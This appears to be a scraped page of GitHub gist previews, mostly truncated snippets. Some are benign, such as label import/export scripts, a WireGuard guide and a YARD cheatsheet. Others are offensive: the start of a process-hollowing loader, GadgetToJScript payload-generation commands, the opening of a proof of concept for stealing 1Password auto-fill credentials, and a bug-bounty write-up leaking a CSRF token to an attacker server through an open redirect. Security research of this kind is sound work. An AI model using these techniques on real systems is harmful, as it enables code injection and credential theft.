KING SABRI KINGSABRI

@AHilyard
AHilyard / import-github-labels.js
Created January 6, 2022 20:22
Import Github Labels via console commands
/*
This script will import Github labels from an array.
Optionally, existing labels can be removed prior to import.
Instructions:
Go to the labels page for the repo you'd like to import to (https://github.com/user/repo/labels)
Run the labels exporter script first, if you haven't. (https://gist.github.com/AHilyard/a5b9376d0326fd658a8064d5569791a4)
Modify this script by pasting your labels in where directed,
and optionally changing the "removeExisting" variable to true.
Press Enter
*/
@AHilyard
AHilyard / export-github-labels.js
Last active April 19, 2023 12:56
Export Github Labels via console commands
/*
This script will export Github labels to an array.
This array can then be imported using the label importer script.
Instructions:
Go to the labels page for the repo you'd like to export from (https://github.com/user/repo/labels)
Paste this script in your console
Press Enter
Copy the resultant array into the importer script. (https://gist.github.com/AHilyard/5babebe06c30a48e07d949053e00bd5c)
*/
@med0x2e
med0x2e / process-hollowing.cs
Last active November 4, 2021 12:49
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetsToJScript

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating or URI-encoding user input on the client side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. JavaScript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
@etiennetremel
etiennetremel / README.md
Last active May 8, 2024 19:57
Simple Wireguard setup as VPN server and multiple clients

Simple WireGuard configuration

1 server, 2 clients

Getting started

Install WireGuard on all machines.

Generate all keys

#include <Windows.h>
#include <cassert>
int
main(int argc, char **argv)
{
    (void)argc;
    (void)argv;
    // The instructions are generated from this code:
    return 0;
}
@phansch
phansch / yardoc_cheatsheet.md
Last active March 1, 2024 18:17 — forked from chetan/yardoc_cheatsheet.md
Improved YARD cheatsheet
@JoshCheek
JoshCheek / evolution
Created August 2, 2016 17:47
Terminal L-System in a tweet
Posted here https://twitter.com/josh_cheek/status/760519587758690304
Previously https://twitter.com/josh_cheek/status/667501443226558464
Based on http://algorithmicbotany.org/papers/abop/abop-ch1.pdf
ruby -e 's = "F-F-F-F"; 3.times { s = s.gsub /f/i, "F" => "FF-F-F-F-FF" };
dirs = [" \e[2D\e[A", " ", " \e[2D\e[B", " \e[4D"].map { |s| s * 2 }
print "\e[H\e[2J\e[60;20H\e[45m" # clear and "center"
s.each_char { |c| c == "F" ? print("\e[45m",dirs[0]) : c == "f" ? print("\e[49m", dirs[0]) : c == "-" ? dirs.rotate!(1) : c == "+" ? dirs.rotate!(-1) : :noop }
puts'
@claudijd
claudijd / steal_1password_creds.rb
Last active October 10, 2019 23:09
Steal 1Password credentials from browser auto-fill PoC
# Path setting sleight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'
capture_thread = Thread.new do
cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
cap.stream.each do |p|
pkt = PacketFu::Packet.parse p
if pkt.payload.include?("executeFillScript")